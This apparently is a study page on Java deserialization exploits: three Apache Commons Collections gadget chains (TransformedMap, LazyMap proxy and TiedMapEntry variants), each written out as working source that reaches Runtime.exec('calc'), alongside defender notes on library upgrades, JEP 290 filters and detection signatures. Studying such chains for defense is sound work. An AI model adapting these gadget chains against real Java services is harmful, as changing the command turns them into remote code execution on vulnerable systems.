[toc]
CC0
|
/**
 * Commons Collections gadget chain, TransformedMap variant (the author's "CC0").
 * Kept as a reference for what an inbound deserialization filter must reject.
 *
 * Sink: the last InvokerTransformer reaches Runtime.exec with the constant "calc";
 * every step is plain reflection driven by the victim's ObjectInputStream, so no
 * application code of the target is involved.
 *
 * Defender notes:
 *  - Commons Collections 3.2.2+ / 4.1+ refuse to deserialize InvokerTransformer and the
 *    other unsafe functors unless org.apache.commons.collections.enableUnsafeSerialization
 *    is explicitly set, so keeping the library current neutralises this family.
 *  - A JEP 290 ObjectInputFilter (jdk.serialFilter, Java 9 and later 8 updates) that
 *    rejects org.apache.commons.collections.** blocks the stream before any readObject runs.
 *  - Detection: serialized streams carrying ChainedTransformer/InvokerTransformer class
 *    names alongside TransformedMap or LazyMap are a reliable signal for this chain.
 *
 * serilize/unserilize are helpers defined elsewhere in this file (not shown here).
 */
public static void main(String[] args) throws Exception {
    // Step 1: a constant transformer that yields the java.lang.Runtime class object.
    Class<?> clazz = Class.forName("java.lang.Runtime");
    Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(clazz),
        // Step 2: Class.getMethod("getRuntime") via reflection.
        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
        // Step 3: Method.invoke(null) on the static getter -> Runtime instance.
        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
        // Step 4 (sink): Runtime.exec("calc").
        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> hm=new HashMap<>();
    hm.put("value","b");
    // TransformedMap applies the value transformer whenever a value is set through it;
    // the key "value" is the member name of the Target annotation used below.
    Map<Object,Object> tmap = TransformedMap.decorate(hm,null,chainedTransformer);
    // Trigger: the JDK-internal AnnotationInvocationHandler.readObject walks the map and
    // writes back through the entries (version-dependent behaviour; later JDK 8 updates
    // copy the map first, which is why this variant stops working there).
    Class<?> anoclazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor<?> constructor=anoclazz.getDeclaredConstructor(Class.class,Map.class);
    constructor.setAccessible(true);
    Object aih=constructor.newInstance(Target.class,tmap);
    serilize(aih);
    unserilize("ser.bin");
}
|
CC1
|
/**
 * Commons Collections gadget chain, LazyMap + dynamic proxy variant ("CC1").
 *
 * Same four-step reflective Runtime.exec chain as the TransformedMap sample; only the
 * trigger differs: a Map proxy whose handler is AnnotationInvocationHandler turns any
 * Map method call into a LazyMap lookup, and a missing key makes LazyMap run its factory.
 *
 * Defender notes:
 *  - Blocked by Commons Collections 3.2.2+ / 4.1+ (unsafe functors not deserializable by
 *    default) and by a JEP 290 ObjectInputFilter rejecting the collections package.
 *  - Like the TransformedMap variant it depends on the JDK-internal
 *    sun.reflect.annotation.AnnotationInvocationHandler; it is JDK-version dependent.
 *
 * Note: unlike the other two samples on this page, this one never writes o out —
 * unserilize("ser.bin") reads whatever file is already present.
 * serilize/unserilize are defined elsewhere in the file (not shown).
 */
public class CC1 {
    public static void main(String[] args) throws Exception {
        // Reflective chain: Runtime.class -> getMethod("getRuntime") -> invoke -> exec("calc").
        Class<?> clazz = Class.forName("java.lang.Runtime");
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(clazz),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            // Sink.
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> hm = new HashMap<>();
        // LazyMap.get() on an absent key invokes the factory transformer — the trigger.
        Map<Object, Object> lm=LazyMap.decorate(hm,chainedTransformer);
        Class<?> anoclazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> constructor = anoclazz.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        // Inner handler wraps the LazyMap; the proxy forwards every Map call to it.
        InvocationHandler aih = (InvocationHandler) constructor.newInstance(Override.class, lm);
        // Raw Map type is kept as in the original; the proxy implements only Map.
        Map mapproxy= (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),new Class[]{Map.class},aih);
        // Outer handler holds the proxy so that its readObject touches the proxy map
        // (JDK-internal behaviour, version-dependent).
        Object o =constructor.newInstance(Override.class,mapproxy);
        unserilize("ser.bin");
    }
}
|
CC6
|
/**
 * Commons Collections gadget chain, HashMap + TiedMapEntry + LazyMap variant ("CC6").
 *
 * Same reflective Runtime.exec chain; the trigger is a TiedMapEntry stored as a HashMap
 * key, whose hashCode() resolves its value through the LazyMap and hence through the
 * factory transformer.
 *
 * Defender notes:
 *  - This variant uses no JDK-internal class, so it is not stopped by JDK updates alone;
 *    the effective mitigations are upgrading Commons Collections (3.2.2+ / 4.1+ refuse the
 *    unsafe functors by default) and/or a JEP 290 ObjectInputFilter on every
 *    ObjectInputStream that can see untrusted bytes.
 *  - Detection: a serialized HashMap whose key is
 *    org.apache.commons.collections.keyvalue.TiedMapEntry backed by a LazyMap is
 *    characteristic of this chain.
 *
 * serilize/unserilize are defined elsewhere in the file (not shown).
 */
public class CC6 {
    public static void main(String[] args) throws Exception {
        // Reflective chain: Runtime.class -> getMethod("getRuntime") -> invoke -> exec("calc").
        Class<?> clazz = Class.forName("java.lang.Runtime");
        Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(clazz),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
            // Sink.
            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<Object, Object> hm = new HashMap<>();
        // A harmless constant factory while the graph is assembled locally, so nothing
        // fires in this process; it is swapped for the real chain via reflection below.
        Map<Object, Object> lm= LazyMap.decorate(hm,new ConstantTransformer(1));
        // TiedMapEntry.hashCode()/getValue() look the key up in lm (a LazyMap.get call).
        TiedMapEntry tiedMapEntry=new TiedMapEntry(lm,"kkk");
        HashMap<Object, Object> hashMap = new HashMap<>();
        // put() hashes the key once here, which makes LazyMap insert "kkk" with the constant
        // value; it is removed again so the key is absent when the map is rehashed on read.
        hashMap.put(tiedMapEntry,"1111");
        lm.remove("kkk");
        // Replace the factory after the local hash has already been computed.
        Class c = LazyMap.class;
        Field factoryField = c.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(lm, chainedTransformer);
        serilize(hashMap);
        unserilize("ser.bin");
    }
}
|
sink替换(不用的命令执行方式)
同类型替换
二次反序列化
Reference
EkiXu/marshalexp (github.com)
白日梦组长的个人空间_哔哩哔哩_bilibili